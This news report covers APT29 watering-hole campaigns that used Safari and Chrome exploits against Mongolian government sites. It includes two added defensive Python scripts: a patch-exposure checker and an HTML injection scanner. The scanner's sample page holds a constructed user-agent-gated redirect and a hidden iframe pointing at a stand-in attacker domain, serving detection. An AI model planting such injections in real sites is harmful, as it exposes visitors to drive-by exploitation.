Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyberattack

Aug 29, 2024 | Ravie Lakshmanan | Browser Security / Vulnerability

Google's Threat Analysis Group (TAG) has identified multiple in-the-wild campaigns that exploited now-patched vulnerabilities in Apple Safari and Google Chrome to deliver information-stealing malware to mobile users.

Google TAG researcher Clement Lecigne said in a report shared with The Hacker News, “These campaigns used zero-day exploits despite patches being available, and were successful in penetrating devices that had not applied the patches.”

The activity, observed between November 2023 and July 2024, is notable for its use of a watering hole technique: the attackers compromised the Mongolian government websites cabinet.gov[.]mn and mfa.gov[.]mn and used them to deliver the exploits to visitors.

Google attributes the attacks with moderate confidence to the Russian state-sponsored group APT29 (also tracked as Midnight Blizzard), noting that the exploits are the same as, or strikingly similar to, ones previously used by the commercial surveillance vendors Intellexa and NSO Group, which points to exploit reuse.


The vulnerabilities exploited in these campaigns are as follows:

  • CVE-2023-41993 – A WebKit vulnerability that can lead to arbitrary code execution when processing specially crafted web content (fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)
  • CVE-2024-4671 – A use-after-free in Chrome's Visuals component that can lead to arbitrary code execution (fixed by Google in Chrome 124.0.6367.201/.202 for Windows and macOS, and 124.0.6367.201 for Linux, in May 2024)
  • CVE-2024-5274 – A type confusion in the V8 JavaScript and WebAssembly engine that can lead to arbitrary code execution (fixed by Google in Chrome 125.0.6422.112/.113 for Windows and macOS, and 125.0.6422.112 for Linux, in May 2024)
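Because the list above gives exact fixed builds, a defender can use ordinary web-server logs to estimate how many visitors were still running an unpatched Chrome during the campaign window. The script below is an added example written for this page, not Google's or Google TAG's code. It takes the fix builds quoted above as thresholds, uses a constructed set of log entries, and reads the Sec-CH-UA-Full-Version-List client hint (where the server logged it) because modern Chrome reports only a reduced version such as 125.0.0.0 in its User-Agent string. Android fix builds are not stated on this page, so Android visitors are reported as unknown rather than guessed.

```python
"""Exposure check from web-server logs: which visitors ran a Chrome build
that still lacked the fixes for CVE-2024-4671 and CVE-2024-5274?

Added illustration, not Google TAG tooling. Fix builds come from the
advisory list above; the platform detection heuristics and the sample
log entries are constructed for this example.
"""
import re
from collections import Counter
from typing import Optional

# Minimum patched build per platform. Windows/macOS shipped two builds
# (.201/.202 and .112/.113); the lower one is the threshold since anything
# at or above it carries the fix. Android is deliberately absent: the page
# does not give its fixed build, so Android visitors come back "unknown".
FIXED_BUILDS = {
    "CVE-2024-4671": {p: (124, 0, 6367, 201) for p in ("windows", "macos", "linux")},
    "CVE-2024-5274": {p: (125, 0, 6422, 112) for p in ("windows", "macos", "linux")},
}

UA_CHROME_RE = re.compile(r"Chrome/(\d+)\.(\d+)\.(\d+)\.(\d+)")
# The Sec-CH-UA-Full-Version-List header carries the real build even when
# the User-Agent string has been reduced to "major.0.0.0".
CH_CHROME_RE = re.compile(r'"(?:Google Chrome|Chromium)";v="(\d+)\.(\d+)\.(\d+)\.(\d+)"')


def platform_of(ua: str) -> str:
    # Android UAs also contain "Linux", so test for Android first.
    if "Android" in ua:
        return "android"
    if "Windows NT" in ua:
        return "windows"
    if "Macintosh" in ua:
        return "macos"
    if "Linux" in ua or "X11" in ua:
        return "linux"
    return "unknown"


def chrome_build(ua: str, ch_full_version_list: Optional[str] = None):
    """Return (major, minor, build, patch) for Chrome proper, or None.

    Edge and Opera carry a Chrome/ token too but ship their own fixed
    builds, so they are skipped rather than mis-scored.
    """
    if "Edg/" in ua or "OPR/" in ua:
        return None
    if ch_full_version_list:
        m = CH_CHROME_RE.search(ch_full_version_list)
        if m:
            return tuple(int(x) for x in m.groups())
    m = UA_CHROME_RE.search(ua)
    return tuple(int(x) for x in m.groups()) if m else None


def assess(ua: str, cve: str, ch_full_version_list: Optional[str] = None) -> str:
    """Classify one visitor as patched, vulnerable, indeterminate or unknown."""
    threshold = FIXED_BUILDS[cve].get(platform_of(ua))
    build = chrome_build(ua, ch_full_version_list)
    if threshold is None or build is None:
        return "unknown"
    # Reduced UA ("125.0.0.0"): only the major version is trustworthy. A
    # different major decides the case; an equal major cannot be resolved
    # without the client hint.
    if build[1:] == (0, 0, 0):
        if build[0] > threshold[0]:
            return "patched"
        if build[0] < threshold[0]:
            return "vulnerable"
        return "indeterminate"
    return "patched" if build >= threshold else "vulnerable"


def summarize(entries, cve: str) -> dict:
    """Count visitors per status for one CVE; entries are (ua, ch_header) pairs."""
    return dict(Counter(assess(ua, cve, ch) for ua, ch in entries))


# Constructed sample log entries: (User-Agent, Sec-CH-UA-Full-Version-List or None).
SAMPLE_LOG = [
    ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/124.0.6367.60 Safari/537.36", None),
    ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/125.0.0.0 Safari/537.36",
     '"Google Chrome";v="125.0.6422.112", "Chromium";v="125.0.6422.112", "Not.A/Brand";v="24.0.0.0"'),
    ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/125.0.0.0 Safari/537.36", None),
    ("Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/125.0.6422.72 Mobile Safari/537.36", None),
    ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0", None),
]

if __name__ == "__main__":
    for cve in FIXED_BUILDS:
        print(cve, summarize(SAMPLE_LOG, cve))
```

The "indeterminate" bucket is the practical lesson: since Chrome's User-Agent reduction, an access log alone cannot tell 125.0.6422.60 from 125.0.6422.112, so a fleet that wants real numbers either logs the client hint or inventories browsers from the endpoint side. A version check also says nothing about whether exploitation actually succeeded; it only bounds who was exposed.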

The November 2023 and February 2024 attacks compromised the two Mongolian government sites (both cabinet.gov[.]mn and mfa.gov[.]mn in the first instance, and only mfa.gov[.]mn in the second) to deliver an exploit for CVE-2023-41993 through a malicious iframe pointing to an attacker-controlled domain.


When a visitor reached the compromised sites from an iPhone or iPad, the iframe loaded a reconnaissance payload. After a set of validation checks, that payload downloaded and ran the WebKit exploit, whose final stage stole browser cookies from the device.

The cookie-stealing framework described by Google TAG had already surfaced in 2021, when an iOS vulnerability (CVE-2021-1879) was exploited to steal authentication cookies for major sites including Google, Microsoft, LinkedIn, Facebook, Yahoo, GitHub, and Apple iCloud, and to exfiltrate them over WebSocket to an attacker-controlled IP address.

At the time, Google noted, “For the cookies to be successfully stolen, the victim needed active sessions on these websites via Safari,” adding, “The perpetrators used LinkedIn messages to target government officers from western European nations by sending them malicious URLs.”

The fact that the cookie stealer specifically targeted “webmail.mfa.gov[.]mn” suggests that Mongolian government personnel were the primary targets of the iOS operation.

Then, in July 2024, the mfa.gov[.]mn portal was compromised a third time. This time the attackers injected JavaScript that redirected Android users running Chrome to a malicious URL serving an exploit chain for CVE-2024-5274 and CVE-2024-4671, with an information stealer as the final payload.
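Both injections described on this page, the iframe pointing at an attacker-controlled domain in the iOS campaigns and the user-agent-gated redirect script in the July 2024 Android campaign, are things a site owner can look for in a page snapshot. The scanner below is an added example written for this page, not code from Google TAG or from the affected sites. It assumes a constructed page snapshot, a constructed site host (portal.example) and a constructed attacker domain (cdn-example.invalid), and it adds one heuristic the page itself does not mention: a zero-size or hidden iframe is flagged as well, since that is how drive-by iframes are commonly concealed.

```python
"""Scan a saved HTML page for two watering-hole injection patterns:
  * <iframe> (or <script src>) loading from a host outside the site, and
  * inline JavaScript that branches on navigator.userAgent and redirects.

Added illustration, not tooling from Google TAG or the affected sites.
The sample page, site host and attacker domain below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline script that reads the user agent and then navigates elsewhere.
UA_REDIRECT_RE = re.compile(
    r"navigator\.userAgent.*?(?:location\.(?:href|replace|assign)|window\.open)",
    re.S,
)


class InjectionScanner(HTMLParser):
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []          # list of (kind, detail)
        self._in_script = False
        self._script_src = None     # None while inside an inline script
        self._script_buf = []

    def _is_offsite(self, url: str) -> bool:
        host = urlparse(url).hostname
        if not host:                # relative URL: same site by definition
            return False
        host = host.lower()
        return not (host == self.site_host or host.endswith("." + self.site_host))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            if self._is_offsite(src):
                self.findings.append(("offsite_iframe", src))
            # Heuristic added here: hidden or zero-size frames are a common
            # way to conceal a drive-by loader.
            style = (a.get("style") or "").replace(" ", "").lower()
            if ("display:none" in style or "visibility:hidden" in style
                    or a.get("width") == "0" or a.get("height") == "0"):
                self.findings.append(("hidden_iframe", src))
        elif tag == "script":
            self._in_script = True
            self._script_src = a.get("src")
            self._script_buf = []
            if self._script_src and self._is_offsite(self._script_src):
                self.findings.append(("offsite_script", self._script_src))

    def handle_data(self, data):
        if self._in_script and self._script_src is None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            body = "".join(self._script_buf)
            if self._script_src is None and UA_REDIRECT_RE.search(body):
                self.findings.append(("ua_gated_redirect", body.strip()[:80]))
            self._in_script = False
            self._script_src = None
            self._script_buf = []


def scan(html: str, site_host: str):
    """Return the list of (kind, detail) findings for one page snapshot."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed snapshot of a compromised page (not a real capture).
SAMPLE_PAGE = """<html><head><title>Ministry portal</title>
<script src="/static/app.js"></script>
<script>
if (/Android/.test(navigator.userAgent) && navigator.userAgent.indexOf("Chrome") !== -1) {
  window.location.href = "https://cdn-example.invalid/u/";
}
</script>
</head><body>
<iframe src="/news/embed" width="600" height="400"></iframe>
<iframe src="https://cdn-example.invalid/x/" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PAGE, "portal.example"):
        print(f"{kind:20s} {detail}")
```

Run this against periodic snapshots of your own pages and diff the findings against a known-good baseline; a new off-site iframe or a new script that consults the user agent before navigating is worth an immediate look. The regex is deliberately simple and will miss obfuscated or externally hosted redirect logic, which is why the off-site script check is kept alongside it.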


The chain uses CVE-2024-5274 to compromise the renderer and CVE-2024-4671 to escape the sandbox, ultimately breaking out of Chrome's site isolation protections and dropping an information stealer.

“This assault dispatches a straightforward program that eliminates all Chrome crash reports and transports the subsequent Chrome databases to the server track-adv[.]com – mirroring the basic end payload identified in past iOS campaigns,” Google TAG said.


Google also said that the exploit used in the November 2023 watering hole attack and the one used by Intellexa in September 2023 share the exact same trigger code, and that the same is true of the CVE-2024-5274 trigger used in the July 2024 watering hole attack and the one used by NSO Group in May 2024.

In addition, the CVE-2024-4671 exploit is said to resemble an earlier Chrome sandbox escape that Intellexa was observed using alongside another Chrome vulnerability, CVE-2021-37973, which Google patched in September 2021.

How the attackers obtained the exploits for the three vulnerabilities is not known, but the findings underline that state-backed actors are now using n-day exploits that were originally deployed as zero-days by commercial surveillance vendors (CSVs).

One possibility is that the exploits were bought from a vulnerability broker who had earlier sold them to the spyware vendors as zero-days. A steady supply of such exploits keeps this cycle going even as Apple and Google harden their defenses.

“Furthermore, watering hole assaults still pose a menace where sophisticated exploits can be employed to target regular site visitors, including mobile users,” the researchers mentioned. “Watering holes can be an effective channel for n-day exploits to mass target a demographic that may still have unpatched browsers.”
